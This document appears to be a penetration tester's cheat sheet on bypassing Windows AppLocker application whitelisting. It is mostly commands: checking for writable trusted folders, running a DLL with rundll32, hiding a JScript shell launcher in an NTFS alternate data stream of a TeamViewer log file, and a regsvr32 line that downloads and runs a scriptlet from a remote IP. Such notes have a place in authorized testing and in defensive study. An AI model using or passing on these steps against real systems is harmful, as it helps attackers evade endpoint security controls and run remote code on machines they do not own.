Application Whitelisting Bypass

Get-AppLockerPolicy -Local

check AppLocker

Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe

AppLocker rules do not apply to the built-in local accounts such as Local System, Local Service, or Network Service. (service accounts)

AppLocker Basic Bypass

AppLocker only available on Enterprise and Ultimate editions of Windows

Default normal user whitelist dir: C:\Program Files, C:\Program Files (x86), and C:\Windows.

Default admin user can use any executables.

1. check W dir in admcmd

accesschk.exe "user" C:\Windows -wus

2.check RX dir in adm cmd

icacls.exe C:\Windows\Tasks

if no DLL rules

rundll32 .\TestDll.dll,run

If have DLL rules, combine with Trusted Folder techniques, copy .dll to the RX dir still works

1. poc.js (can be .net2Js.js)

var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");

3. cop .js to file as alt data

type poc.js > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:poc.js"

4. chk alt data is written

dir /r "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log"

5. execute ADS

wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:poc.js"

Execution of python, perl, java, macro embedded in MS Office file... can bypass AppLocker

regsvr32 /s /n /u /i:http://192.168.119.120/shell.sct scrobj.dll

regsvr32 /s /u /i:shell.sct scrobj.dll

Last updated 1 year ago